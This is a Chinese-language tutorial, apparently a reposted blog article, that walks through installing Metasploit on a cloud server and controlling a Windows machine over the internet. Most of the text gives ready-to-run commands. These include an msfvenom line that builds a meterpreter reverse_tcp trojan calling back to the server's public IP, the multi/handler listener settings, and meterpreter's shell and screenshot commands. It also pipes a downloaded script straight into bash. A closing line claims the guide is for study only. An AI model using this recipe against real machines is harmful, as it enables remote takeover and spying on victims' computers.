超牛叉的外网渗透详细教程

超牛叉的外网渗透详细教程

文章来源 简书

https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文)

众所周知,Metasploit 是个内网渗透神器。

但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。

搜索结果的话,

首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。

所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。

本质其实都一样。但是亲测后者比较有用。

可!是!

第二个方法有一个特点,就是很烦。

买好服务器之后再下载frp,服务器上下载完之后还得在Kali上面下。下载完天都黑了,还得改这个改那个。最后一堆ip还搞来搞去。

于是笔者就想到了。

既然都有服务器了,为啥不直接在服务器上安装msf呢???非得绕这么大圈子???

你需要这些东西

·一台能用ssh的电脑(本文以 Mac 为例)

·一台 Linux 云服务器/云主机/ECS/VPS(名字不同,实质一样,不过不是虚拟主机哦)(本文以 Debian 10 系统为例)(现在市面上的那种免费云主机就能用了)

·一台没开杀毒软件的 Windows 电脑(虚拟机)(本文以 XP SP3 为例)

安装 msf

(msf就是 Metasploit Framework 的简称)

首先你需要用ssh连上你的服务器。具体步骤我就不赘述了,可以自行百度,服务器提供商应该也有教程提供。

用以下命令下载msf的安装包。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

将其设为可执行文件。

chmod +x msfinstall

运行安装包。

./msfinstall

初始化数据库

msfdb init

(运行到这里笔者的服务器报错说在root用户下不能运行这个命令,所以我就直接略过初始化数据库了,其实不运行这个命令貌似也不会有什么问题)

然后你的服务器上就已经安装好了msf。

配置宝塔面板

因为这是服务器,不是虚拟机。上传下载文件非常不方便。所以我们这里安装一个宝塔面板。

这是官方教程

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh

安装完之后,复制终端给的链接,进入面板。

它会跳出来让你推荐安装的东西。我们这里先不用安装。

生成木马

我们回到终端,运行下面的命令生成木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的服务器外网ip) lport=(随便取个端口号) -f exe > /root/(木马文件名).exe

-p 设置payload,无需改动

lhost 监听IP,此处填你服务器的外网IP(一定要外网ip,不然目标机器找不到你。比如你家住在xx市xx路xx号xx室,你某宝买东西就填xx室,谁找得到你啊喂。)

lport 监听端口,这里随便写一个,最好是4位数,而且没有规律的那种。不然端口已经可能被占用了。

-f 生成文件的格式 > 文件放置的目录和文件名 (一般放在root目录下即可)

比如你的服务器外网ip是 某某某.某某某.某某某.某某某

端口想选 1086

木马文件放在 /root/iammuma.exe

你就应该运行

msfvenom -p windows/meterpreter/reverse_tcp lhost= 某某某.某某某.某某某.某某某 lport=1086 -f exe > /root/iammuma.exe

图片

木马生成成功

开放端口/下载木马

这时候,我们就需要用到宝塔面板了。

开放端口

点击左侧菜单中的 安全。

增加一个放行端口。

端口填上面的你选的。

备注/说明随便写。

下载木马

点击左侧菜单中的 文件 。

图片

宝塔面板文件

再点击根目录。

图片

根目录

再点击进入root文件夹。

图片

root文件夹

我们可以看到,木马已经生成了。

点击下载,然后拖入 Windows 虚拟机中。

图片

木马在虚拟机中

先别急着运行木马。

开始监听

你需要把msf的监听打开,才能检测到木马返回的数据。

第一次,我设置lhost为127.0.0.1。

127.0.0.1是回送地址,指本地机,一般用来测试使用。——百度百科

结果

图片

用127.0.0.1

在虚拟机狂点木马也没反应。

于是我改用外网IP。

于是就成功了。hhhhh庆祝一下。

图片

成功

(看到meterpreter就是成功了,目标机基本上就已经被你掌握在手里了)

步骤:

1 进入msf

msfconsole

2 加载监听模块

use exploit/multi/handler

3 设置payload,要和木马设置的payload相同,如果你是按照上文来的话就不用修改。

set payload windows/meterpreter/reverse_tcp

4 设置监听ip,就是你的服务器外网ip

set lhost (服务器外网IP)

5 设置端口,lport后面的数字就是你之前设置的端口。如果你是按照上文来的话就也不用修改。

set lport 1086

6 开始监听

run

7 在虚拟机里点击木马。

(如果点一次不行就多点几次。一定要关掉杀毒软件!!!等10秒左右一般都能有了)

搞定之后

这里就写一下 meterpreter 的一些基本操作。

shell

这个命令就可以用目标机的cmd控制目标机。

screenshot

图片

截图

这个命令就可以给目标机截图。

我们可以在宝塔面板里找到截下来的图片。

图片

宝塔面板里的截图

总结

总的来说,就是在服务器上生成木马并监听,并且用宝塔面板开启端口并下载木马文件,最后在 Windows 上运行木马。

本教程仅供学习用,严禁用于非法用途。

相关推荐

扶摇皇后+番外(1)
beat365体育亚洲版登录

扶摇皇后+番外(1)

⌛ 2025-09-26 👁️ 4524
一文看懂 Windows、macOS、Linux、Android、iOS 的区别与选择
beat365体育亚洲版登录

一文看懂 Windows、macOS、Linux、Android、iOS 的区别与选择

⌛ 2025-07-26 👁️ 9762
关键绩效指标
约彩365苹果在线安装

关键绩效指标

⌛ 2025-07-02 👁️ 5052